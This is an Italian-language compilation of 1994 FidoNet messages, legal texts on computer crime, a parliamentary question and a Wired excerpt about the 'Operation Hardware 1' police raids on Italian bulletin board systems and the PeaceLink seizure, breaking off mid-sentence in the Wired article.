Art. 617-sexies (Falsificazione, alterazione o soppressione del
contenuto di comunicazioni informatiche o telematiche).- Chiunque, al fine
di procurare a se o ad altri un vantaggio o di arrecare ad altri un danno,
forma falsamente ovvero altera o sopprime, in tutto o in parte, il
contenuto, anche occasionalmente intercettato, di taluna delle
comunicazioni relative ad un sistema informatico o telematico o
intercorrenti tra piu' sistemi, e' punito, qualora ne faccia uso o lasci
che altri ne facciano uso, con la reclusione da uno a quattro anni.
La pena e' della reclusione da uno a cinque anni nei casi previsti dal
quarto comme dell'articolo 617-quater.
Art. 7
1.- Nell'articolo 621 del codice penale, dopo il primo comma e' inserito il
seguente:
Agli effetti della disposizione di cui al primo comma e' considerato
documento anche qualunque supporto informatico contenente dati,
informazioni o programmi.
Art. 8
1.- L'articolo 623-bis del codice penale e' sostituito dal seguente:
Art. 623-bis (Altre comunicazioni o conversazioni).- Le disposizioni
contenute nella presente sezione, relative alle comunicazioni e
conversazioni telegrafiche, telefoniche, informatiche o telematiche, si
applicano a qualunque altra trasmissione a distanza di suoni, immagini o
altri dati.
Art. 9
1.- Dopo l'art. 635 del codice penale e' inserito il seguente:
Art. 635-bis (Danneggiamento di sistemi informatici e telematici).-
Chiunque distrugge, deteriora o rende, in tutto o in parte, inservibili
sistemi informatici o telematici altrui, ovvero programmi, informazioni o
dati altrui, e' punito, salvo che il fatto costituisca piu' grave reato,
con la reclusione da sei mesi a tre anni.
Se ricorre una o piu' circostanze di cui als econdo comma dell'art.
635, ovvero se il fatto e' commesso con abuso della qualita' di operatore
di sistema, la pena e' della reclusione da uno a quattro anni.
Art. 10
1.- Dopo l'art. 640-bis del cosice penale e' inserito il seguente:
Art. 640-ter (Frode informatica).- Chiunque, alterando in qualsiasi
modo il funzionamento di un sistema informatico o telematico o intervenendo
senza diritto con qualsiasi modalita' su dati, informazioni o programmi
contenuti in un sistema informatico o telematico o ad esso pertinenti,
procura a se o ad altri un ingiusto profitto con altrui danno, e' punito
con la reclusione da sei mesi a tre anni e con la multa da lire centomila a
due milioni.
La pena e' della reclusione da uno a cinque anni e della multa da lire
seicentomila a tre milioni se ricorre una delle circostanze previste dal
numero 1) del secondo comma dell'art.640, ovvero se il fatto e' commesso
con abuso della qualita' di operatore di sistema.
Il delitto e' punibile a querela della persona offesa, salvo che
ricorra taluna delle circostanze di cui al secondo comma o un'altra
circostanza aggravante.
Art. 11
1.- Dopo l'articolo 266 del CPP e' inserito il seguente:
Art. 266-bis (intercettazioni di comunicazioni informatiche o
telematiche).- Nei procedimenti relativi ai reati indicati nell'articolo
266, nonche' a quelli commessi mediante l'impiego di tecnologie
informatiche o telematiche, e' consentita l'intercettazione del flusso di
comunicazioni relativo a sistemi informatici o telematici ovvero
intercorrente tra piu' sistemi.
---------------------------------------------------------------------------
And now alcuni messaggi presi qua' e la' ...
-------------------------MESSAGGI------------------------------------------
* Forwarded from "SYSOP.033 ->Conf. Sysop Italia"
* Originally by Vertigo, 2:331/301
* Originally to Tutti
* Originally dated 12 May 1994, 0:49
Salve a tutti.
Quanto sto per riferirvi e' alquanto frammentario e confuso
perche' deriva da informazioni raccolte da piu' fonti al
telefono e quindi non ho tutti i dettagli: il succo
comunque e' che nella giornata di mercoledi' 11 maggio la
guardia di finanza ha compiuto una serie di raid presso
molte BBS Fidonet, sequestrando computer ed apparecchiature!
Pare che la cosa sia avvenuta nell'ambito di un'inchiesta
sulla pirateria avviata dalla procura di Pesaro e avente
come indiziati due tizi di nome Paolo Paolorosso e Riccardo
Cardinali (non sono certo al 100% dei nomi, ma cosi' mi
hanno riferito). La guardia di Finanza e' andata a casa di
parecchi sysop Fidonet (e, pare, anche non Fidonet) per
accertamenti, perquisendo le abitazioni, esaminando
computer e dischetti e sequestrando materiale (computer,
stampanti, modem, dischetti) o sigillandolo.
Conosco i nominativi di sysop solo del 331 visitati dalla
finanza, tra i quali Alfredo Persivale, Domenico Pavone,
Valentino Spataro, Luca Croci, Luca Spada e Walter
Mascarin, ma credo che la cosa sia estesa anche altrove in
Italia.
Ho parlato telefonicamente con Domenico, il quale riferisce
che hanno addirittura messo i sigilli alla stanza
contenente computer e dischetti, nella quale ora non puo'
piu' entrare.
Non si ha idea del motivo per cui queste persone (sulle cui
BBS non era presente materiale piratato) siano state
coinvolte nell'inchiesta. Se qualcuno ha informazioni piu'
precise in merito, si faccia avanti.
Oggi mi incontrero' con un po' di persone coinvolte nella
cosa e cercheremo di fare il punto della situazione. Credo
sia superfluo invitare tutti alla massima cautela e
collaborazione.
Ciao,
--V--
* Forwarded from "SYSOP.033 ->Conf. Sysop Italia"
* Originally by Enrico Franceschetti, 2:335/212.1
* Originally to Tutti
* Originally dated 13 May 1994, 16:27
Ciao a tutti.
Assisto con sgomento e meraviglia a quanto e' accaduto l'11 maggio scorso a
molti amici e "colleghi" sysops di tante parti d'Italia.
Un provvedimento di un giudice pesarese, motivato dalla
necessita' di sgominare
un traffico di software duplicato, ha dato la stura ad una serie di azioni
istruttorie e misure cautelari davvero notevole.
Tutti abbiamo sentito parlare di attrezzature elettroniche (a volte anche
banali, come segreterie telefoniche o apparecchi autocostruiti) poste sotto
sequestro, di perquisizioni minutissime in appartamenti ed aziende, di sigilli
poste ad ambienti di casa. Insomma, un vero e proprio blitz organizzato
pensando di affrontare una organizzazione oliata e ben esperta nel crimine.
Ma cio' e' plausibile?
Quale professionista ed "operatore del diritto" rimango colpito dal modo con
cui questa serie di azioni sono state eseguite. Vengono di fatto inferti a
privati cittadini, senza l'esistenza di sostanziali elementi di prova a loro
carico, danni notevolissimi di carattere economico e morale.
Il blocco di un computer, la sua asportazione, l'impossibilita' di svolgere le
consuete attivita' lavorative ad esso legate, comportano un ingiusto danno da
sopportare, assolutamente sproporzionato sia agli elementi in possesso degli
inquirenti e sia al tipo di reato contestato (non si riesce ad immaginare
la portata delle azioni che, basandosi sul metro di quanto abbiamo visto, do-
vrebbero venire attuate quando di mezzo vi sono organizzazioni criminali ben
piu' pericolose ed attive).
Per non parlare poi delle spese legali che dovranno essere
affrontate da chi ha
ricevuto avvisi di garanzia, il 100% dei quali, ne sono certo, si sgonfieranno
come neve al sole; non prima pero' di aver tenuto in ambasce famiglie intere e
costretto le medesime a notevoli esborsi economici.
In sostanza, e denegando ogni principio giuridico
esistente, occorre dimostrare
di essere innocenti... e sopportare in silenzio le conseguenze della propria
"presunta colpevolezza".
Ma non basta.
So che da tempo un'altra struttura pubblica di investigazione stava preparando
con accuratezza una indagine sulle Bbs pirata; da mesi, con infiltrazioni,
contatti, appostamenti, si stava raccogliendo il materiale necessario per
inchiodare i veri responsabili di questo traffico illecito alle proprie
responsabilita'.
Ora, l'intervento clamoroso di questo magistrato, lungi dall'aver colpito veri
"pirati" ha ottenuto l'unico effetto di terrorizzare decine di onest'uomini e
far scappare (distruggendo ogni materiale illegale) i professionisti della
copia i quali, messi in allarme da questo inutile polverone, saranno ora molto
piu' attenti e cauti nelle loro attivita'.
A chi giova tutto cio'?
La risposta e' di difficile individuazione. Certo, non puo' sfuggire la
grossolanita' dell'intervento operato e la sua durezza, nonche' la scarsissima
preparazione tecnica denotata dalle varie "squadre" di finanzieri che si sono
mosse in tutto il paese, preferendo troppo spesso sequestrare e sigillare
piuttosto che cercare di comprendere cosa si trovavano davanti.
Ugualmente non puo' non notarsi come la telematica amatoriale in Italia sia
davvero strumento "potente" per la diffusione e la circolazione delle idee.
Forse come in nessuna altra parte del mondo in Italia le "reti" amatoriali
conservano uno spirito appunto "amatoriale" che le rende
disponibili facilmente
ad una grande platea di utenti, strangolati invece dalle elevate tariffe dei
servizi pubblici (Videotel in testa).
Allo stato non sappiamo ancora quali sviluppi attenderci: speriamo solo di non
essere costretti ad ammettere che il paese che una volta era la culla del
diritto e' divenuto oggi soltanto un paese di indagati ed inquisitori.
Ciao,
Enrico
* Forwarded from "SYSOP.033 ->Conf. Sysop Italia"
* Originally by Vertigo, 2:331/301
* Originally to Tutti
* Originally dated 13 May 1994, 11:39
Copia in SYSOP.033 e crash agli NC/NEC.
Alcune notizie sparse sulla faccenda dei sequestri, scusate la telegraficita'
1) Ieri sera qui a Milano ci siamo incontrati in parecchi tra sysop coinvolti
e non, per discutere della faccenda. Con la sola eccezione
di Walter Mascarin e Michele Fadda, a quanto mi risulta, a
tutti e' stato sequestrato il materiale informatico,
portandolo via o sigillando i locali in cui era contenuto.
2) Occorre immediatamente organizzarsi per cercare legali
in loco (Pesaro). Qualcuno si e' gia' mosso personalmente
(Luca Spada ha preso un avvocato pesarese), Franco Mulato
sta cercando di organizzarsi in questo senso.
Avvertite tutti coloro che hanno ricevuto avviso di
garanzia di mettersi in contatto con Franco Mulato,
inviandogli copia del documento via fax al numero 0574-
38816 ed allegando un recapito telefonico a VOCE.
3) Domenica pomeriggio a Bologna ci sara' un incontro
straordinario per discutere della faccenda. Sede e dettagli
ancora da definire, teniamoci in contatto telefonicamente,
il mio numero d'ufficio e' 02-76001713.
4) Io e la Folletta, su proposta di Pasquini, ci stiamo
organizzando per stendere il testo di un'interpellanza
parlamentare sull'accaduto che dovrebbe essere inoltrata
dal radicale Roberto Cicciomessere nei prossimi giorni. Chi
avesse materiale da sottoporre o proposte me le faxi in
ufficio (fax 02-780472).
5) Occorre cercare di organizzare una specie di sottoscrizione per
raccogliere qualche soldo per le spese (avvocati etc.) a
favore di chi e' gia' stato coinvolto e di chi lo sara'
prossimamente. L'impressione comune e' che la cosa
procedera' anche nei prossimi giorni con nuovi raid e
sequestri.
6) Su "La Repubblica" di oggi e' apparso un articolo a pag.
21 a firma di Claudio Gerino che descrive l'accaduto. Non
ho visto finora riferimenti su altri quotidiani.
Ciao,
--V--
(RC)
* Forwarded from "SYSOP.033 ->Conf. Sysop Italia"
* Originally by Sandro Gasparetto, 2:334/201
* Originally to All
* Originally dated 14 May 1994, 20:19
* Crossposted in SYSOP.033
* Crossposted in NETSYSOP.334
Per fortuna non sono venuti da me (ancora).
Nel dubbio ho interpellato il mio avvocato, e gli ho chiesto come comportarmi.
Il mio avvocato e' pure un amico da decenni (andavamo a scuola insieme), per
cui mi fido di quello che mi ha detto, e con me non si
esprime in termini oscuri, ma mi ha sempre aiutato.
- Arrivano con un mandato, per cui non e' possibile fermarli o opporsi.
- Hanno un ordine esecutivo, possono fare quasi di tutto, ma.....
- se il PC e' legato ad una attivita' (hardware o software)
non hanno assolutamente il potere di fermare questa
attivita' commerciale (se non temporaneamente), per cui con
un buon avvocato si puo' fare in modo che prelevino quanto
serve per la loro inchiesta, senza pregiudicare il
proseguimento della attivita'. Si puo' parlare di copie o
simili cose....
- l'eventuale sequestro dovrebbe essere di breve durata.
Lui conta di fare ottenere velocemente il dissequestro al
mio amico Gianni.
- Secondo lui ( e' in contatto con un altro avvocato di
Pesaro) l'inchiesta e' stata "a campione", partendo da
indirizzi trovati a caso. Nel mucchio hanno preso anche
gente che non c'entra niente. Ma ora dovrebbe essere tutto
finito.
( no altre visite...)
- Lui pensa che l'andazzo di usare metodi "terroristici e
vessatori" dovrebbe smettere, e lui conta che tra non molto
cambi.
La gente che lavora dovrebbe non essere piu' criminalizzata di una finanza che
tiene in ostaggio una intera classe sociale.
Quest'ultima e' una mia considerazione, prendetela come uno sfogo.
bye, Sandro
* Area : SYSOP.033 ->Conf. Sysop Italia
* From : Vertigo, 2:331/301 (Mercoledi Maggio 18 1994 19:57)
* To : Tutti
* Subj : ANSA: altri 14 !
Appena arrivato! :-(
Torino, 18 Mag 19:20
INFORMATICA: DENUNCIATI IN TUTTA ITALIA 14 "PIRATI"
Quattordici "pirati informatici" italiani che, avvalendosi di collegamenti
telematici con esperti americani, sottraevano aoftware ai produttori e poi li
commercializzavano in Italia a prezzi irrisori, sono stati denunciati a piede
libero dal nucleo regionale di polizia tributaria della Guardia di Finanza.
Nell'operazione e' stato sequestrato materiale complessivo per un valore di
circa quattro miliardi di lire: 17 personal computer, 13690 floppy disk
contenenti software illecitamente duplicato, otto dischi CdRom, 27 modem per
collegamenti tramite linee telefoniche, quattro apparecchiature per l'utilizzo
di linee telefoniche, manuali di istruzione per programmi e componenti per
elaboratori elettronici.
La Guardia di Finanza, che sta ancora completando le indagini, non ha reso noto
i nominativi degli indagati, ma soltanto le citta' dove sono stati fatti i
sequestri: Torino, Poirino (Torino), Sesto san Giovanni (Milano), Savona,
Genova, Pesaro, Terni, Napoli, Pesaro e Pescara. "La tecnologia utilizzata dai
pirati - e' detto in una nota della Guardia di Finanza - ha stupito gli stessi
militari del nucleo regionale di polizia tributaria, che si sono trovati di
fronte a soggetti utilizzatori di comunicazioni via satellite, di 'call card'
contraffatte per usufruire delle reti telefoniche private nordamericane e dei
piu' avanzati personal computer". (ANSA)
Msg#: 2979 Rec'd Local Date: 26 May 94 00:34
From: Il Conte Read: Yes Replied: No
Subj: risposte
PRIMA DOMANDA: Se ti vedi spuntare la GdF a casa, accendi subito un
lumino al tuo Santo preferito, perche' sono guai.
I cattivi, muniti di mandato di perquisizione e sequestro,
arrivano e ti chiedono:
a) di vedere i tuoi dischetti; se ne trovano di non originali,
contenenti files .EXE e simili, li mettono in uno scatolino e li
sequestrano;
b) di stampare la directory del tuo hard disk (per esempio, con
un DIR /s(ubdirectories) /h(idden); dal nome delle subdirectories o
dei programmi, li identificano e ti chiedono le licenze originali; se
hai tutti programmi regolarmente acquistati bene, se no procedono al
sequestro del computer (quale cosa che servi' a commettere il presunto
reato).
c) non sono in grado di precisare se la GdF conosce l'esistenza
dei programmi Public Domain o Shareware: volendo, potrebbero ritenere
abusivi anche tali programmi.
* * *
Il sequestro si effettua mediante:
- sigillatura dello scatolo contenente i dischetti, che vengono
descritti nel verbale;
- sigillatura del computer, su cui viene apposta una striscia di
carta con i timbri della P.G. che ne impediscono l'uso.
La GdF (o gli altri organi di Polizia Giudiziaria) redigono un
verbale di sequestro, dove e' allegata la DIR dell'HDD, e trasmettono
tutto all'Autorita' Giudiziaria.
* * *
Contro il sequestro e' consentito il ricorso al c.d. Tribunale
della Liberta' (o del riesame); ne ho fatto uno, e me l'hanno
rigettato con una motivazione del tipo: vediamo il processo, e poi ti
diremo se il sequestro e' legittimo.
* * *
L'Autorita' Giudiziaria, poverina, non sa nulla di informatica e
si rivolge ad un perito perche' esamini il materiale sequestrato e
dica la sua.
All'esito, dopo qualche anno, potrebbe rinviarti a giudizio, ed
allora comincerebbe a discutersi:
- di quali fatti ti hanno incolpato;
- di quali prove ritengono di avere.
L'unico soggetto oggettivamente avvantaggiato di tale situazione
e' il perito, il quale si trova ad avere numerosi e remunerati
incarichi a spese dello Stato.
* * *
E se, dopo un paio di anni (almeno), ti assolvono per non aver
commesso il fatto, o perche' il fatto non sussiste ?
Niente: ti dicono (forse) "scusi tanto", e tutto finisce li',
visto che il risarcimento e' previsto solo per chi patisce una
ingiusta detenzione e non per chi sta qualche anno senza computer e/o
senza programmi lecitamente acquistati.
Altro che da ridere: ci sara' da piangere.
E se ti condannano ?
E se la BSA o l'Assoft si costituiscono parte civile nel
processo, per chiedere il risarcimento dei danni ?
* * *
SECONDA PARTE DELLA DOMANDA
Il vecchissimo PCTOOLS dell'88, ai fini che ci interessano, e'
perfettamente equivalente all'ultimo costosissimo game piu' o meno
virtuale: il passare degli anni, come sappiamo, rende del tutto fuori
commercio un programma, ma non ne autorizza affatto la copiatura
abusiva.
Per quanto riguarda la sussistenza o meno del reato, vedi
appresso.
* * *
TERZA ED ULTIMA PARTE
Nello spirito attuale di caccia alle streghe, stanno chiudendo
le BBS (Costituzione, aiutaci tu se prima non ti stracciano sti'
leghisti del ca**o): sarebbe antipatico se, ad esempio, il sistema
contenesse la indicazione (che non costituisce una prova, ma un
indizio) che l'utente ICS ha prelevato (in data --- alle ore ---) un
file contenente un programma abusivamente duplicato.
* * *
INSOMMA: QUAL'E' IL CONTENUTO DI 'STA BENEDETTA LEGGE ?
Boh !
Nel senso che siamo a livelli (anche di stupidita' ed ignoranza)
seriamente preoccupanti.
Basta vedere l'annunzio pubblicato dalla BSA qualche mese fa su
MCMicrocomputer: una sorta di scheda per fare la spia, e denunciare
(magari rimanendo anonimi) il conoscente, o la persona semplicemente
antipatica, che detiene software illegalmente duplicato.
Avete mai visto, su qualche rivista o giornale, una scheda di
questo tipo per denunciare (che so io) i casi di violenza sui minori,
o di spaccio di droga davanti alle scuole ?
Questo dovrebbe significare, agli occhi di un ingenuo osservatore
alieno, che scopiazzare il software e' assai piu' grave (o socialmente
riprovevole) che spegnere le sigarette sulla pancia dei figli che
strillano troppo e vendere il crack ai quattordicenni stanchi della
vita.
* * *
In ordine al contenuto della legge sul diritto d'autore
(novellata dal D. Leg.vo 29-12-1992 n. 518), nessuno dei tecnici del
diritto - me compreso - ha le idee chiare, data la novita' della
riforma ed il suo contenuto schifosamente atecnico (sia dal punto di
vista giuridico che da quello informatico).
Essendo poco chiaro per un giurista, il testo novellato della
legge e' davvero incomprensibile ai comuni mortali: cio' nonostante,
mettero' a disposizione dell'area quanto e' a mia conoscenza (non ho
un testo completo).
* * *
Anteriormente alla novella di cui al citato D.L.vo n. 518/92, le
norme incriminatrici connesse alla tutela del diritto d'autore erano
contenute esclusivamente nel titolo III, capo III, sezione II della
Legge 22 aprile 1941 n. 633, intitolata "Difese e sanzioni penali"
(artt. 171 e 172).
L'unica norma punitiva applicabile ai programmi per elaboratore
era, sino alla novella, l'art. 171 lett. a), che punisce chiunque :
"riproduce, trascrive, recita in pubblico, diffonde, vende o mette in
vendita o pone altrimenti in commercio un'opera altrui o ne rivela il
contenuto prima che sia reso pubblico, o introduce e mette in
circolazione nello Stato esemplari prodotti all'estero contrariamente
alla legge italiana (...)".
A seguito della citata novella, e' stato introdotto l'art. 171
bis, il quale cosi' dispone:
"Chiunque abusivamente duplica a fini di lucro programmi per
elaboratore o, ai medesimi fini e sapendo o avendo motivo di sapere
che si tratta di copie non autorizzate, importa, distribuisce, vende,
detiene a scopo commerciale, o concede in locazione i medesimi
programmi, e' soggetto alla pena della reclusione da tre mesi a tre
anni e della multa da L.500.000 a L.6.000.000. Si applica la stessa
pena se il fatto concerne qualsiasi mezzo inteso unicamente a
consentire o facilitare la rimozione arbitraria o l'elusione
funzionale dei dispositivi applicati a protezione di un programma per
elaboratore. La pena non e' inferiore nel minimo a sei mesi di
reclusione e la multa a L.1.000.000 se il fatto e' di rilevante
gravita' ovvero se il programma oggetto dell'abusiva duplicazione,
importazione, distribuzione, vendita, detenzione a scopo commerciale o
locazione sia stato precedentemente distribuito, venduto o concesso in
locazione su supporti contrassegnati dalla Societa' italiana degli
autori ed editori ai sensi della presente legge e del relativo
regolamento di esecuzione approvato con regio decreto 18 maggio 1942
n. 1369.
La condanna per i reati previsti al comma 1' comporta la
pubblicazione della sentenza in uno o piu' quotidiani e in uno o piu'
periodici specializzati."
* * *
Primo dubbio: vale il principio secondo cui una norma dettagliata
(il nuovo art. 171 bis) annulla la precedente norma generica (il
vecchio art. 171), oppure le norme coesistono entrambe, riguardando
fattispecie diverse ?
Credo, sinceramente, che l'art. 171 non sia piu' applicabile al
software, regolato da una nuova e specifica norma, se non mi ingannano
le dure pagine dei manuali di diritto penale digerite all'universita'
(e, purtroppo, anche ora).
Si dovrebbero, quindi, distinguere due tipi di comportamenti
penalmente sanzionati dal citato art. 171 bis:
a) la abusiva duplicazione, a fini di lucro, di programmi per
elaboratore ("Chiunque abusivamente duplica a fini di lucro programmi
per elaboratore");
b) la importazione, distribuzione, vendita, detenzione a scopo
commerciale, o la locazione di programmi per elaboratore, fatta a fini
di lucro, da parte di chi sa od ha motivo di sapere che si tratta di
copie non autorizzate ("ai medesimi fini e sapendo o avendo motivo di
sapere che si tratta di copie non autorizzate, importa, distribuisce,
vende, detiene a scopo commerciale, o concede in locazione i medesimi
programmi").
Ai posteri l'ardua sentenza: aspettiamo di vedere le prime
decisioni, ed i primi ricorsi per cassazione, e allora si' che ci
sara' da ridere.
489 27-Giu-94 14:00 3626 G.Borrello I Roma
---------------------------------------------------------------------
INTERROGAZIONE PARLAMENTARE
(a risposta scritta)
Atti Parlamentari Camera dei Deputati, Seduta del 24 giugno 1994
NARDINI Maria Celeste, VOCCOLI Francesco (Rifondazione)
Ai Ministri delle finanze, delle poste e telecomunicazioni e dell'interno.
Per sapere -
- premesso che:
in data 3 giugno 1994 e stata sequestrata la banca dati centrale della rete
Peacelink in seguito ad una perquisizione ordinata da un magistrato di Taranto;
la banca dati centrale della rete telematica Peacelink:
era pubblicizzata su tutte le riviste pacifiste;
aveva diffuso in tempo reale, lo scorso anno, le informazioni sulla
conferenza ONU di Vienna sui diritti umani;
era il supporto tel
ematico per la realizzazione del giornale "I Siciliani",
fondato da Giuseppe Fava, giornalista assassinato dalla mafia;
era stata segnalata da RAI Televideo nell'ambito della rubrica "L'Italia
antipiovra" e "Spazio civile" per l'impegno antimafia;
era stata segnalata da RAI Televideo nell'ambito della rubrica "Spazio
civile" per i suoi collegamenti telematici con la ex Jugoslavia e per i
soccorsi umanitari che si avvalevano di una banca dati specializzata
dell'Italian consorzium of solidarity e di una struttura di volontariato
dell'aria (elisoccorso Montecalvoli), ragion per cui l'Alto commissariato per i
rifugiati ONU ne aveva chiesto la collaborazione per i soccorsi di emergenza;
era utilizzata da insegnanti per attivita di educazione alla pace e alla
legalita;
sul settimanale "Avvenimenti" in data 15 giugno 1994 appare che tale
attivita, in particolare quella relativa al pacifismo e al contatto con le
scuole era assoggettata a forme di controllo e -pare- di interferenza da parte
di uomini dei servizi poco prima che avvenisse l'attentato al giudice Falcone;
il bliz della banca dati centrale di proprieta di Giovanni Pugliese, sita in
Statte (TA), e basato su una indagine promossa da un capitano della Guardia di
finanza di Taranto che ha ritenuto sicure e affidabili voci viceversa
fantasiose e infondate di uso di tale banca dati per diffondere a scopo di
lucro programmi per computer copiati;
tale raccolta di informazioni non e stata verificata mediante collegamenti
via modem dalla Guardia di finanza di Taranto-
se siano a conoscenza dei fatti citati;
se la Guardia di finanza di Taranto sia dotata di modem e se sia in grado di
usarlo per compiere accertamenti sulle banche dati telematiche;
per quali motivi non sia stata fatta alcuna verifica via modem delle fantasiose
voci giunte alla Guardia di finanza;
se i Ministri in indirizzo non ravvisino in un simile episodio la spia per una
scarsa professionalita e non ritengano di avviare un'indagine sui livelli di
preparazione specifica di tali apparati, in relazione alla prevenzione e alla
repressione della criminalita informatica e telematica, prima che si
verifichino altre perquisizioni e sequestri che -fallendo clamorosamente
l'obiettivo- finiscano per colpire strutture di volontariato informativo che
andrebbero al contrario promosse e sostenute;
se attualmente i servizi di informazione stiano svolgendo un ruolo di
acquisizione di notizie sulle reti telematiche, a che scopo e se in tale
indagine sia stata coinvolta -e per quale motivo- anche Peacelink, nota per i
meriti acquisiti nelle attivita sopra elencate;
quali azioni intendano intraprendere allo scopo di evitare che simili
situazioni non abbiano piu a ripetersi;
come intendano garantire alla banca dati della rete telematica Peacelink la
ripresa di una attivita essenziale, nonche riconosciuta da piu parti, alla
crescita di una coscienza pacifista e alla difesa dei diritti umani.
* Forwarded from "SYSOP.033 ->Conf. Sysop Italia"
* Originally by Felice Murolo, 2:335/206@fidonet.org
* Originally to all
* Originally dated 16 May 1994, 12:51
** AGGIORNAMENTO **
Segue lista BBS visitati da GDF desunta da messaggi e telefonate. Scusate
le omissioni e imprefezioni.
Notizie:
- Gli avvisi di garanzia emessi sono stati 173.
- L'avvocato Francesco Guida di Taranto, che collabora con PeaceLink, ha
costituito un gruppo di studio del problema. FAX/segreteria 099 365812,
richiede l'invio di tutte le infos possibili.
Fido:
------
Luca Spada 2:331/106-117-121 sequestrato tutto
Alberto Giovaninetti 2:331/103 sequestrato tutto
Luca Croci 2:331/108 ?
Ascanio Orlandini 2:331/203 solo perquisito
Paolo Borghesi 2:331/204 sequestrato tutto
Alfredo Persivale 2:331/302 sequestrato tutto, anche comp. azienda
Michele Fadda 2:331/320 solo perquisito
Walter Mascarin 2:331/323 solo perquisito
Domenico Pavone 2:331/331 sequestrata la stanza del computer!
Othmar Tschrepp 2:331/334 sequestrato o sigillato
Giulio Cipriani 2:331/344 sequestrato tutto
Valentino Spataro 2:331/347 sequestrato tutto
Franco Mulato 2:332/101 ?
Samuele Landi 2:332/115 sequestrato tutto
Max Morando 2:332/200 sequestrato tutto
Massimo Berni 2:332/300-301 sequestrato tutto
Roberto Nucci 2:332/303 ?
Alberto Tommasoli 2:332/306 ?
Riccardo Pizzi 2:332/307 sequestrato tutto
Alessandro Trebbi 2:332/313 ?
Lorenzo Lugli 2:332/315 sequestrato tutto a casa sua (la bbs no)
Fabrizio Carloni 2:332/316 sequestrato tutto
Massimo Sabbatini 2:332/320 sequestrato tutto, compreso negozio
Alessandro Benvenuti 2:332/400 sequestrato tutto
Paolo Sinigaglia 2:332/2-407-417-427 sequestrato tutto
Marcello Ardini 2:332/418 sequestrato tutto
Mario Mure' 2:332/505 sequestrato tutto
Marco Venturini Auti 2:332/617 sequestrato tutto
Riccardo Iacobucci 2:332/618 sequestrato tutto
Mario Zambon 2:333/203 sequestrato solo dischetti
Piergiorgio Ghezzo 2:333/707-708 ?
Gianni Bragante 2:334/307 sequestrato Hard Disk
Paolo Goria 2:334/701 risparmiato, sequestrato computers sponsor
Andrea Contini 2:335/428 sequestrato tutto
Alberto Marcedone 2:335/503 convocato dai CC
Marco Tomassoni 2:335/514 convocato dai CC
Michele Scopelliti 2:335/512 sequestrato tutto
Giuseppe Giardina 2:335/713 sequestrato tutto
Non fido:
----------
Vittorio Mori ex fido, non piu' bbs, sequestrato tutto
Curradini "Breakdown", sequestrato tutto
Giuseppe Paterno' "Il Tempio BBS", sequestrato tutto
Super pirata, Terni non identificato, sequestrato tutto
Riccardo Cassotti perquisito, BBS chiusa 8 mesi fa.
Points:
--------
Borghesi 2:331/204.3 sequestrato tutto
Caruso 2:331/204.6 sequestrato tutto
Bisanti ?? sequestrato tutto
Ciao
Felix
574 7-Lug-94 00:54 2949 V.Russo I Roma
-----------------------------------------------------------------------------
PeaceLink - studio legale avv.Guida
Vi giro un mes ricevuto da Alessandro Marescotti in area AVVENIMENTI. Valerio
Ciao Valerio!
Ieri notte mi chiedevi - per conto di Parrella - informazioni piu'
particolareggiate sui motivi che hanno indotto il Tribunale di Taranto a
rifiutare il dissequestro del BBS host di PeaceLink, cioe' quello di Pugliese.
Questo e' almeno cio' che ho capito nel sonno... ;-))
Particolari sulle motivazioni del mancato dissequestro si possono chiedere
all'avv.Francesco Guida, il cui numero dello studio e' 099/365812 (tel./fax).
Sara' fatta a questo punto una nuova richiesta di dissequestro, non piu' al
Tribunale del Riesame ma al Gip, adducendo motivazioni legali concernenti non
piu' la non regolarita' dell'azione del PM ma la peculiare azione del BBS in
termini di servizio la cui interruzione puo' causare danno alla comunita'. Mi
sono espresso in termini forse infelici, non sono un avvocato...
Circa le motivazioni del non dissequestro, il Tribunale del Riesame, nonostan-
te avesse avuto tutto il tempo di esaminare per bene la faccenda dato che
sussisteva lo sciopero degli avvocati, non ha voluto ficcardi in una faccenda
forse ritenuta troppo complicata ed inedita da riesaminare.
Certo e' che l'avv.Guida vorrebbe avere da qualcuno che in Italia ha un po' di
dati, la documentazione di dissequestri gia' avvenuti nei giorni scorsi, dopo
l'azione Hardware1 di Pesaro, con relative motivazioni.
Il Tribunale del Riesame ha evidenziato una cattiva volonta' di fondo, tanto
da ritenere che il contributo di 100 mila lire fornito dal Liceo Classico Ar-
chita di Taranto e dall'Istituto Professionale Archimede "per l'uso del BBS"
possano essere messi in relazione con l'accusa specifica che - ricordo - e'
del tutto assurda: Pugliese viene accusato di aver chiesto dalle 50 alle 200
mila lire a collegamento telematico per trasferire programmi commerciali. La
fonte di tale accusa e' coperta dal segreto istruttorio. Cio' che e' grave e'
che la Guardia di Finanza non l'abbia verificata prima di passarla al Pubblico
Ministero e che il Pubblico Ministero Benedetto Masellis, prima di accoglierla
e far eseguire la perquisizione da Pugliese, non abbia richesto al capitano
della Guardia di Finanza, tal Cazzato, una piu' precisa verifica delle fonti
(dal capitano ritenute altamente affidabili).
L'insieme di tutte queste "coincidenze" CI FA FORTEMENTE SOSPETTARE
sull'indipendenza e sulla reale spontaneita' dell'operazione.
Ragion per cui il nostro atteggiamento sta passando dal piano della cautela a
quello piu' "politico" del sospetto sulle finalita' che mal si celano dietro a
questa manovra che, colpendo Giovanni Pugliese, ha colpito tutti noi e - non
dimentichiamolo - il cuore di PeaceLink: piu' in alto non potevano mirare.
Se a settembre PeaceLink sara' piu' debole, vorra' dire che l'operazione era
ben congegnata e aveva un fine ben calcolato.
Ciao. Alessandro
609 14-Lug-94 08:16 2962 B.Parrella USA Oakland CA
----------------------------------------------------------------------------
Articolo su WIRED Magazine (Agosto 94).
Riporto di seguito il testo integrale dell'articolo che appare a pagina 29 del
n.2.08 del mensile WIRED Magazine.
(NB: il pezzo e' stato chiuso in redazione il 7 giugno).
-----------
Hacker Crackdown, Italian style
Crackdowns on Italian BBSes demonstrate that US law enforcement agencies are
not alone in dealing with Net crimes by shutting down as much of cyberspace as
they can. Early in the morning of May 11, sysops in Italy awoke facing machine
guns. Italian police, acting on a warrant, raided 119 Fidonet Italia bulletin
board systems, according to Gaetano Savoldelli Pedrocchi, the Pesaro prosecu-
tor managing the investigations. Police officials removed computer hardware,
disks, answering machines, audiotapes, and other magnetic storage media, remi-
niscent of the infamous "Operation Sundevil" in the United States in 1990.
The police operation, code-named "Operation Hardware 1," targeted a suspected
software piracy ring allegedly run by two users of a Pesaro-based BBS. The two
may have used Fidonet Italia nodes to orchestrate the distribution of illegal-
ly copied software. Most likely, police officials simply raided each Fidonet
node named on a public phone-list held by the two suspected software pirates.
"The crackdown needed to be done. Software piracy has become a national sport
in Italy," Pedrocchi said in an interview with an Italian magazine. "We acted
after precise information about the activities of a specific databank: if some
